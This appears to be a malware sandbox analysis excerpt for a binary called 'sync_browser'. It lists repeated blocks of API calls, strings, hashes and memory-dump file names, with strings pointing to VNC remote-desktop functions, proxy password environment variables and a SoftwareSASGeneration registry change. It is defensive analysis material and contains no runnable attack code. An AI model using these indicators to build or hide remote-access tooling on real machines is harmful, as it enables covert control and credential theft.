                                                                    • Opcode ID: 00ed22fe1ca1a25bb662bc61b52b6084809bf4c045d17fe901cbd0028fd4bcc6
                                                                    • Instruction ID: 27a6040654ec7da9752e6fa43792604bf3df54ab08d90929dede82aaafadf780
                                                                    • Opcode Fuzzy Hash: 00ed22fe1ca1a25bb662bc61b52b6084809bf4c045d17fe901cbd0028fd4bcc6
                                                                    • Instruction Fuzzy Hash: 1F21A261B0DA46C1EA10BB62A8001B9E3A1EF85BD4FC40031DE4D07B7CEE6CE586C720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _wgetenv$_errno_invalid_parameter_noinfo
                                                                    • String ID: CONNECT_PASSWORD$HTTP_PROXY_PASSWORD$SOCKS5_PASSWD$SOCKS5_PASSWORD
                                                                    • API String ID: 1184729097-3964388033
                                                                    • Opcode ID: 75c89c269b5bdbccb324d11e52bf46f8eda89c740f1d11fad698b593103782f0
                                                                    • Instruction ID: 03c465ce336337a6fb8f678a29827b3565ecbf788bf778473d400521c75bc441
                                                                    • Opcode Fuzzy Hash: 75c89c269b5bdbccb324d11e52bf46f8eda89c740f1d11fad698b593103782f0
                                                                    • Instruction Fuzzy Hash: B621A621A1EA46C0FD65BB15F8916B4D2E0BF68B45FC84475DA0C463BAFE2CF941C260
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ChainChangeClipboardCurrentKillThreadTimer
                                                                    • String ID: vncdesktopsink.cpp : Unsethooks Failed$vncdesktopsink.cpp : Unsethooks OK$vncdesktopsink.cpp : WM_DESTROY$vncdesktopsink.cpp : unset SC hooks OK$vncdesktopsink.cpp : unset W8 hooks OK
                                                                    • API String ID: 3622578367-539335655
                                                                    • Opcode ID: 4ff98f2526b40473347ec64f61ad6471bc2d7702336f109aa2423c9ffd723b96
                                                                    • Instruction ID: b98b27110481c90e89483f310b65fed7c782242e623bda8a1eed44deb6c8eba0
                                                                    • Opcode Fuzzy Hash: 4ff98f2526b40473347ec64f61ad6471bc2d7702336f109aa2423c9ffd723b96
                                                                    • Instruction Fuzzy Hash: A821D1A2A1C982D2F75EBB20E9501F9E3A5FF44701FC84036C61E922B9DF3CB061C220
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close$CreateOpenValue
                                                                    • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies$SoftwareSASGeneration$System
                                                                    • API String ID: 678895439-3579764778
                                                                    • Opcode ID: d324a7fd9c053fdbed078a6d8dbfb6b791194126c2f4355e782ae63509712a99
                                                                    • Instruction ID: a9a7c6c8976e16db0dcb0e54cc3955f4781294cd31a497684c6de3789d9257a4
                                                                    • Opcode Fuzzy Hash: d324a7fd9c053fdbed078a6d8dbfb6b791194126c2f4355e782ae63509712a99
                                                                    • Instruction Fuzzy Hash: D8112C71A1CA46C6EB50AB24F84865AB7A4FB84788F801131EA8D43B78DF3CE149CF10
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Close$CreateDeleteOpenValue
                                                                    • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies$SoftwareSASGeneration$System
                                                                    • API String ID: 2881815620-3579764778
                                                                    • Opcode ID: e69ca6185ab1a7843b6bf4ee7a75db947d055aaacf23707991ad0b828e0a2439
                                                                    • Instruction ID: 032e19579c9abf87115f48d04e9e3e2eb4d4df162a2aa23541514a30b510a418
                                                                    • Opcode Fuzzy Hash: e69ca6185ab1a7843b6bf4ee7a75db947d055aaacf23707991ad0b828e0a2439
                                                                    • Instruction Fuzzy Hash: 97013C31A1CB46C2EB50BB24F84456AB7A4FB84784F801131EA9D47B78EF3CE149CB10
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno$_invalid_parameter_noinfofreemalloc
                                                                    • String ID:
                                                                    • API String ID: 3646291181-0
                                                                    • Opcode ID: 11c538c35a46a4fb5c0c73f141e54ae4a02d4c26eb65e23d1f675c1fad1344f9
                                                                    • Instruction ID: 003359c1125d1841ef422d886aa291dff10aa82e52e4dc9e273fdbdfa9e28043
                                                                    • Opcode Fuzzy Hash: 11c538c35a46a4fb5c0c73f141e54ae4a02d4c26eb65e23d1f675c1fad1344f9
                                                                    • Instruction Fuzzy Hash: A7519F22A0C242CAFB11BFA59540779A6A0EB457A4F944631EA1D077EBDF3CF4418721
                                                                    APIs
                                                                    • _lock.LIBCMT ref: 00007FF7400BAD95
                                                                      • Part of subcall function 00007FF7400C77D0: _amsg_exit.LIBCMT ref: 00007FF7400C77FA
                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF7400BAF59,?,?,00000000,00007FF7400C77FF), ref: 00007FF7400BADC8
                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF7400BAF59,?,?,00000000,00007FF7400C77FF), ref: 00007FF7400BADE6
                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF7400BAF59,?,?,00000000,00007FF7400C77FF), ref: 00007FF7400BAE26
                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF7400BAF59,?,?,00000000,00007FF7400C77FF), ref: 00007FF7400BAE40
                                                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,00000000,00007FF7400BAF59,?,?,00000000,00007FF7400C77FF), ref: 00007FF7400BAE50
                                                                    • _initterm.LIBCMT ref: 00007FF7400BAE90
                                                                    • _initterm.LIBCMT ref: 00007FF7400BAEA3
                                                                    • ExitProcess.KERNEL32 ref: 00007FF7400BAEDC
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DecodePointer$_initterm$ExitProcess_amsg_exit_lock
                                                                    • String ID:
                                                                    • API String ID: 3873167975-0
                                                                    • Opcode ID: 8948cf76fc5cf68bd72f2600188bae6337740dc35318e5811e2f59e4f5aefda3
                                                                    • Instruction ID: 962d7fc08af44a41131cffd28336eddf1a96e30e6194cc19088025f99c22b448
                                                                    • Opcode Fuzzy Hash: 8948cf76fc5cf68bd72f2600188bae6337740dc35318e5811e2f59e4f5aefda3
                                                                    • Instruction Fuzzy Hash: E0416D21A2DA42C1E654BB55F840239E2A5BF89784F844035DA6D47BBDEF3CF4588720
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno$_invalid_parameter_noinfo
                                                                    • String ID:
                                                                    • API String ID: 2819658684-0
                                                                    • Opcode ID: d011579407d24bdfbb9aadfd6c0a3b9405857a9de314b67aa1550ae6c8c7f008
                                                                    • Instruction ID: 957a8ab927cceec16efa5841489cc8231253fc508accb41b193ae711709852c9
                                                                    • Opcode Fuzzy Hash: d011579407d24bdfbb9aadfd6c0a3b9405857a9de314b67aa1550ae6c8c7f008
                                                                    • Instruction Fuzzy Hash: 25315D2590D756C4EB68BB91944017DE661BF55BA0FD44632EA5D437FDDF2CF400C620
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandle$FileUnmapView$CriticalDeleteSection
                                                                    • String ID:
                                                                    • API String ID: 4242051881-0
                                                                    • Opcode ID: 22161c178d6bb14c1052406e1d71c9eb4b4dcb4edfbb29f5cd716a860c71812c
                                                                    • Instruction ID: 3c7bd579b042ee36a43baaacd7850cb78d047aaeb701df1c68110e1efdaa5293
                                                                    • Opcode Fuzzy Hash: 22161c178d6bb14c1052406e1d71c9eb4b4dcb4edfbb29f5cd716a860c71812c
                                                                    • Instruction Fuzzy Hash: 43119025A1EA06C6EB54BF62D9A4678A364FF89F49B841031CA1E42378DF3DE485C360
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Desktop$CloseInputOpen
                                                                    • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                    • API String ID: 1367241101-3977938048
                                                                    • Opcode ID: 872beed9f37bc164325fc22219cfab8ab01e68070e7d89525f2677f35927d260
                                                                    • Instruction ID: 6c47ec5e74cb2739d829bca298d627f0397f845f468eeebb13edd2a504c5d6d3
                                                                    • Opcode Fuzzy Hash: 872beed9f37bc164325fc22219cfab8ab01e68070e7d89525f2677f35927d260
                                                                    • Instruction Fuzzy Hash: 73C1B122A0C691C5E750BB35C4587FEA7A1EB85B84F894039DA4C477B9CF38F844C720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Desktop$CloseInputOpen
                                                                    • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                    • API String ID: 1367241101-3977938048
                                                                    • Opcode ID: 47734043b62fd5003f3baede982ab513a6c8474cbed8e2365ac637b1611529ad
                                                                    • Instruction ID: 48bbbfa3c3913e48e41e09ab6d0cce543135c5d17a56fb3f1e20a715bfc494d3
                                                                    • Opcode Fuzzy Hash: 47734043b62fd5003f3baede982ab513a6c8474cbed8e2365ac637b1611529ad
                                                                    • Instruction Fuzzy Hash: 5AB1BE22A0C691C5E751BB25C4587FEABA1EB85B44F994039DA4C477B9CF39F844CB20
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalDesktopSectionThread$CloseCountCreateEnterInputLeaveOpenResumeRevertSelfTickTimetime
                                                                    • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                    • API String ID: 186452611-3977938048
                                                                    • Opcode ID: 240a7e3f24338c8b8522c66d0c22f1fbf1c168c0c99ca4f370a1211a49b204dc
                                                                    • Instruction ID: 088da45625a9da59856040a0c0b9d0e8cfda859ca17fbc55d8bd6c9075ab6aa6
                                                                    • Opcode Fuzzy Hash: 240a7e3f24338c8b8522c66d0c22f1fbf1c168c0c99ca4f370a1211a49b204dc
                                                                    • Instruction Fuzzy Hash: 13A1CF22A0C681C5E751FB25D4587FEABA1EB85B44F99403ADA4C477B9CF39F884C720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno_invalid_parameter_noinfo$AllocGlobalPathTempsprintf
                                                                    • String ID: !UVNCDIR-$%s%s%s%s$.zip$\*.*
                                                                    • API String ID: 3897446562-3886131270
                                                                    • Opcode ID: 2dc71b03babb7fd5399608604822ef7cdffab7c460b881fcd3b864ae7abfc419
                                                                    • Instruction ID: b55cfbc40290291a517126f2b9a2d142417ebc498ae4c5a7301be577ce2b8b32
                                                                    • Opcode Fuzzy Hash: 2dc71b03babb7fd5399608604822ef7cdffab7c460b881fcd3b864ae7abfc419
                                                                    • Instruction Fuzzy Hash: 69818D22618B8599EB10EB74D4403EDB760FB457A4F904336EAAD13BE9DF78E506C720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
